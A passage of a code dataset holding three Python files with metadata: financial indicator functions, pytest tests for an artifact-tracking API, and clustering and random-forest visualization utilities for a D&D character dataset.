moments.rolling_sum(vmm, n) / trn\n\n return DataFrame(dict(vin=vin, vip=vip))\n\n\n@series_indicator('close')\ndef gmma(s, nshort=[3, 5, 8, 10, 12, 15],\n nlong=[30, 35, 40, 45, 50, 60]):\n short = {str(n): ema(s, n) for n in nshort}\n long = {str(n): ema(s, n) for n in nlong}\n\n return DataFrame(short), DataFrame(long)\n\n\ndef zigzag(s, pct=5):\n ut = 1 + pct / 100\n dt = 1 - pct / 100\n\n ld = s.index[0]\n lp = s.close[ld]\n tr = None\n\n zzd, zzp = [ld], [lp]\n\n for ix, ch, cl in zip(s.index, s.high, s.low):\n # No initial trend\n if tr is None:\n if ch / lp > ut:\n tr = 1\n elif cl / lp < dt:\n tr = -1\n # Trend is up\n elif tr == 1:\n # New high\n if ch > lp:\n ld, lp = ix, ch\n # Reversal\n elif cl / lp < dt:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = -1, ix, cl\n # Trend is down\n else:\n # New low\n if cl < lp:\n ld, lp = ix, cl\n # Reversal\n elif ch / lp > ut:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = 1, ix, ch\n\n # Extrapolate the current trend\n if zzd[-1] != s.index[-1]:\n zzd.append(s.index[-1])\n\n if tr is None:\n zzp.append(s.close[zzd[-1]])\n elif tr == 1:\n zzp.append(s.high[zzd[-1]])\n else:\n zzp.append(s.low[zzd[-1]])\n\n return Series(zzp, index=zzd)\n\n", "repo_name": "mainyaa/bitmech", "sub_path": "bitmech/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 22912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 260, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 280, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 282, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 419, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_max", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 440, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_min", "line_number": 445, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewma", "line_number": 451, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 451, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 466, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 471, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 471, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 472, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 472, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 474, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 492, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 493, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 498, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 499, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 501, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 518, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 521, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 521, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 522, "usage_type": "name"}, {"api_name": "numpy.fabs", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 531, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 531, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 540, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 540, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 541, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 541, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 542, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 542, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 543, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 543, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 546, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 546, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 548, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 558, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 567, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 567, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 568, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 568, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 569, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewmstd", "line_number": 577, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 577, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 579, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 584, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 584, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_std", "line_number": 585, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 585, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 594, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 600, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 645, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 682, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 684, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 685, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 685, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 687, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 696, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 750, "usage_type": "call"}]}
+{"seq_id": "22389621896", "text": "import datetime\n\nimport pytest\n\nfrom piperci_gman.artman import ArtMan\nfrom piperci_gman.orm.models import Artifact, Task, TaskEvent, db\n\n_artifacts = [\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art2',\n 'sri': 'sha256-jrT+J2yEC8wfUr6N/YxxbR/ux5y2GriIqXsySl5uVK8=',\n 'sri-urlsafe':\n 'c2hhMjU2LWpyVCtKMnlFQzh3ZlVyNk4vWXh4YlIvdXg1eTJHcmlJcVhzeVNsNXVWSzg9',\n 'type': 'source',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest',\n 'task_id': 'New'},\n ]\n\n\ndef formateach(data, values):\n i = 0\n for k, v in data.items():\n try:\n data[k] = v.format(values[i])\n i += 1\n except IndexError:\n raise ValueError('Ran out of values to fill dict')\n\n\n@pytest.fixture\ndef artifact(api, client, testtask):\n task = testtask()\n data = {'task_id': task.json['task']['task_id']}\n data.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=data)\n return resp.json, data\n\n\n@pytest.fixture\ndef artifacts(api, client, testtask):\n task = testtask()\n arts = []\n\n for artifact in _artifacts:\n if 'task_id' in artifact and artifact['task_id'] == 'New':\n _task = testtask()\n else:\n _task = task\n\n data = {}\n data.update(artifact)\n data['task_id'] = _task.json['task']['task_id']\n\n resp = client.post(api.url_for(ArtMan), json=data)\n # assert resp.status_code == 200\n if resp.status_code != 200:\n pytest.fail(str(resp.json) + str(data))\n arts.append((resp,\n data))\n\n return arts\n\n\ndef test_get_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.get(f'/artifact/{art_id}')\n assert resp.status_code == 200\n\n\ndef test_get_artifact_bad_request(api, client):\n resp = client.get('/artifact')\n assert resp.status_code == 400\n\n\ndef test_get_bad_artifact(api, client, artifacts):\n resp = client.get(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert len(resp.json) == 1\n assert resp.json[0]['task']['task_id'] == task_id\n\n\ndef test_get_artifacts_by_bad_task_id(api, client, artifact):\n task_id = '31a122e8-9ba8-4f60-a9fb-490c66fd4b0a'\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert resp.status_code == 404\n\n\ndef test_get_artifact_by_bad_sri(api, client, artifact):\n bad_sri = 'c2hhMjU2LXZGYXRjZXlXYUU5QWtzM045b3VSVXRiYTFtd3JJSGRFVkx0aTg4YXRJdmM9'\n resp = client.get(f'/artifact/sri/{bad_sri}')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_sri(api, client, artifacts):\n resp = client.get(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert len(resp.json) == 2\n\n\ndef test_head_artifact_bad_request(api, client):\n resp = client.head('/artifact')\n assert resp.status_code == 400\n\n\ndef test_head_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.head(f'/artifact/{art_id}')\n assert resp.status_code == 200\n assert resp.headers['x-gman-artifact-status'] == 'unknown'\n\n\ndef test_head_bad_artifact(api, client, artifacts):\n\n resp = client.head(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_head_artifacts_by_sri(api, client, artifacts):\n resp = client.head(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert int(resp.headers['x-gman-artifacts']) == 2\n\n\ndef test_head_artifacts_for_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.head(api.url_for(ArtMan, task_id=task_id))\n assert int(resp.headers['x-gman-artifacts']) == 1\n\n\ndef test_put_artifact(api, client):\n\n resp = client.put(api.url_for(ArtMan))\n\n assert resp.status_code == 405\n\n\ndef test_post_artifact_no_task(api, client):\n art = {'task_id': '7d394a53-6f45-4847-bfd1-105eef07dd08'}\n\n art.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 404, 'Code failed to check that the task exists'\n assert 'errors' in resp.json, 'Missing expected errors response'\n assert 'task_id' in resp.json['errors'], (\n 'Did not throw the correct error for this test')\n\n\ndef test_post_bad_artifact_url(api, client):\n\n resp = client.post('/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 400\n\n\ndef test_post_same_artifact_twice(api, client, artifact):\n\n art = {'task_id': artifact[0]['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 409\n\n\n@pytest.mark.parametrize('dissallowed', ('artifact_id', 'timestamp',\n 'status', 'event_id'))\ndef test_post_dissallowed_field(api, client, dissallowed):\n\n art = _artifacts[0].copy()\n art[dissallowed] = 'Some value'\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_post_field_value_errors(api, client):\n\n art = _artifacts[0].copy()\n art['type'] = 'asdfasdfs'\n art['task_id'] = 1234\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_raw_artifact_bad_hash(testtask):\n task_resp = testtask()\n task = Task().get(Task.task_id == task_resp.json['task']['task_id'])\n\n event = TaskEvent.create(task=task,\n message='testing creating an artifact',\n status='info',\n timestamp=datetime.datetime.now())\n with pytest.raises(ValueError):\n Artifact().create(\n task=task,\n event_id=event,\n type='log',\n status='unknown',\n sri='some non sri value',\n uri='https://www.example.com'\n )\n\n\ndef test_failed_artifact_create_no_table(api, client, monkeypatch, testtask):\n task = testtask()\n\n db.drop_tables([Artifact])\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n\n\ndef test_failed_artifact_create_IDK(api, client, monkeypatch, testtask):\n task = testtask()\n\n def myfunc(*args, **kwargs):\n kwargs['uri'] = {'not a valid thing'}\n return None\n\n monkeypatch.setattr('piperci_gman.orm.models.Artifact.create', myfunc)\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n", "repo_name": "dreamteamrepos/piperci-gman", "sub_path": "tests/test_artifact.py", "file_name": "test_artifact.py", "file_ext": "py", "file_size_in_byte": 7407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "piperci_gman.artman.ArtMan", "line_number": 46, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 65, "usage_type": "argument"}, {"api_name": "pytest.fail", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 96, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 104, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 149, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 155, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 164, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 183, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 194, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 188, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 203, "usage_type": "argument"}, {"api_name": "piperci_gman.orm.models.Task", "line_number": 209, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Task.task_id", "line_number": 209, "usage_type": "attribute"}, {"api_name": "piperci_gman.orm.models.TaskEvent.create", "line_number": 211, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.TaskEvent", "line_number": 211, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 216, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db.drop_tables", "line_number": 229, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 234, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 250, "usage_type": "argument"}]}
+{"seq_id": "35986754025", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nfrom collections import defaultdict\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.inspection import permutation_importance\n\n\nCOLOR_DICT = {\n 0: \"blue\",\n 1: \"orange\",\n 2: \"green\",\n 3: \"red\",\n 4: \"purple\",\n 5: \"brown\",\n 6: \"olive\",\n 7: \"gray\",\n 8: \"pink\",\n 9: \"cyan\",\n 10: \"violet\",\n 11: \"magenta\",\n}\n\n\ndef train_visualize_random_forest(\n feature_matrix: np.array,\n labels: list,\n rf_estimators: int,\n rf_random_state: int = 42,\n) -> tuple:\n \"\"\" Trains and visualizes a random forest classifier.\n\n Notes:\n This isn't intended to be particularly flexible and and is more for demo purposes.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n rf_estimators: How many estimators should be used for the RF model?\n rf_random_state: Random state seed for reproducibility.\n\n Returns:\n A dictionary of character names and labels; also returns permutation_importances.\n \"\"\"\n\n # Create the train/test split.\n X_train, X_test, y_train, y_test = train_test_split(\n feature_matrix, labels, random_state=rf_random_state\n )\n\n # Extract the character names from the test set to look at individual results later.\n char_names = X_test[:, 0]\n\n # Delete the character names column before feeding into model.\n X_train = np.delete(X_train, obj=0, axis=1)\n X_test = np.delete(X_test, obj=0, axis=1)\n\n # Train the random forest model.\n rfc = RandomForestClassifier(\n n_estimators=rf_estimators, random_state=rf_random_state\n ).fit(X_train, y_train)\n\n # Build the return dictionary\n labels_by_character = {}\n predicted_labels = rfc.predict(X_test)\n for idx, char in enumerate(char_names):\n ground_truth = y_test[idx]\n predicted = predicted_labels[idx]\n labels_by_character[char] = {\n \"true_label\": ground_truth,\n \"predicted_label\": predicted,\n }\n\n # Do the actual plotting\n fig, ax = plt.subplots(figsize=(20, 20))\n plot_confusion_matrix(rfc, X_test, y_test, normalize=None, ax=ax)\n plt.show()\n\n # Get feature importances\n permutation_importances = permutation_importance(rfc, X_test, y_test, random_state=rf_random_state, n_jobs=2)\n sorted_idx = permutation_importances.importances_mean.argsort()\n\n # Finally, return the dictionary of labels.\n return labels_by_character, permutation_importances, sorted_idx\n\n\ndef visualize_clustering_results(cluster_points: list, labels: list) -> None:\n \"\"\" Visualizes and labels the clusters resulting from an analysis.\n\n Args:\n cluster_points: [(x1, y1), (x2, y2), ..., (xN, yN)]\n labels: Label for each of the points in cluster_points.\n \n \"\"\"\n\n # First, split out the point tuples by label.\n points_by_label = defaultdict(list)\n for idx, point in enumerate(cluster_points):\n points_by_label[labels[idx]].append(point)\n\n # Next, stack the points for each label into a single array.\n big_xy_list_by_label = {}\n for label, points_for_that_label in points_by_label.items():\n big_xy_list_by_label[label] = np.stack(tuple(points_for_that_label))\n\n # Compute the centroids of each point cloud for labeling.\n centroids_by_label = {}\n for label, arr in big_xy_list_by_label.items():\n length = arr.shape[0]\n sum_x = np.sum(arr[:, 0])\n sum_y = np.sum(arr[:, 1])\n centroid = sum_x / length, sum_y / length\n centroids_by_label[label] = centroid\n\n # Initialize a counter to iterate through the color map\n i = 0\n plt.rcParams.update({\"font.size\": 22, \"font.weight\": \"bold\"})\n fig, ax = plt.subplots(figsize=(20, 20))\n for label, coords in centroids_by_label.items():\n ax.scatter(\n big_xy_list_by_label[label][:, 0],\n big_xy_list_by_label[label][:, 1],\n c=COLOR_DICT[i],\n s=50,\n alpha=0.5,\n label=label,\n )\n # plt.scatter(coords[0], coords[1], c=color_dict[i], label=label, s=100, alpha=0)\n ax.annotate(label, xy=coords, textcoords=\"data\", color=\"black\")\n i += 1\n ax.legend(loc=\"best\")\n plt.show()\n\n\ndef tsne_points(feature_matrix: np.array, perplexity: int) -> list:\n \"\"\" Applies a t-SNE analysis and returns the character positions grouped by class.\n\n Notes:\n This isn't the cleanest, but I want parity with the way I analyze the UMAP data, so I\n chose the format to enable that. Because this is for plotting, I don't bother with more\n than 2 t-SNE dimensions (it's hard-coded), and I use 1000 iterations, which seems to offer\n well-converged results based on my testing. I use Manhattan distance for two reasons:\n\n 1. The data is riddled with outliers in the feature space.\n 2. The attribute features range from 0 - 20(ish) while the one-hot vectors are binary,\n and using Euclidean distance would weight the attributes too heavily.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n perplexity: Perplexity for the t-SNE model. N^(1/2) is a reasonable guess.\n\n Returns:\n A list of (x, y) tuples corresponding to the coordinates of each character in the embedding\n space.\n \n \"\"\"\n number_of_t_sne_components = 2\n number_of_t_sne_iterations = 1000\n t_sne_metric = \"manhattan\"\n\n tsne = TSNE(\n n_components=number_of_t_sne_components,\n perplexity=perplexity,\n n_iter=number_of_t_sne_iterations,\n metric=t_sne_metric,\n )\n results = tsne.fit_transform(feature_matrix)\n\n # This is where my hacky plotting script makes us do unseemly things.\n tsne_1 = results[:, 0]\n tsne_2 = results[:, 1]\n plottable_list_form = []\n for idx in range(len(tsne_1)):\n plottable_list_form.append((tsne_1[idx], tsne_2[idx]))\n\n return plottable_list_form\n\n\ndef umap_points(\n feature_matrix: np.array, umap_neighors: int = 200, min_dist: float = 0.1\n) -> list:\n \"\"\" As with the t-SNE method above, but with UMAP instead. \n \n Notes:\n The choice of n_neighbors is currently defaulted to 200, because that's roughly the\n number of members of each class. min_dist was based on some empirical tuning.\n \n \"\"\"\n mapper = umap.UMAP(n_neighbors=umap_neighors, min_dist=min_dist, metric=\"manhattan\")\n u = mapper.fit_transform(feature_matrix)\n return list(u)\n", "repo_name": "dchannah/dndmlpy", "sub_path": "dndmlpy/analysis_utils.py", "file_name": "analysis_utils.py", "file_ext": "py", "file_size_in_byte": 6750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 59, "usage_type": 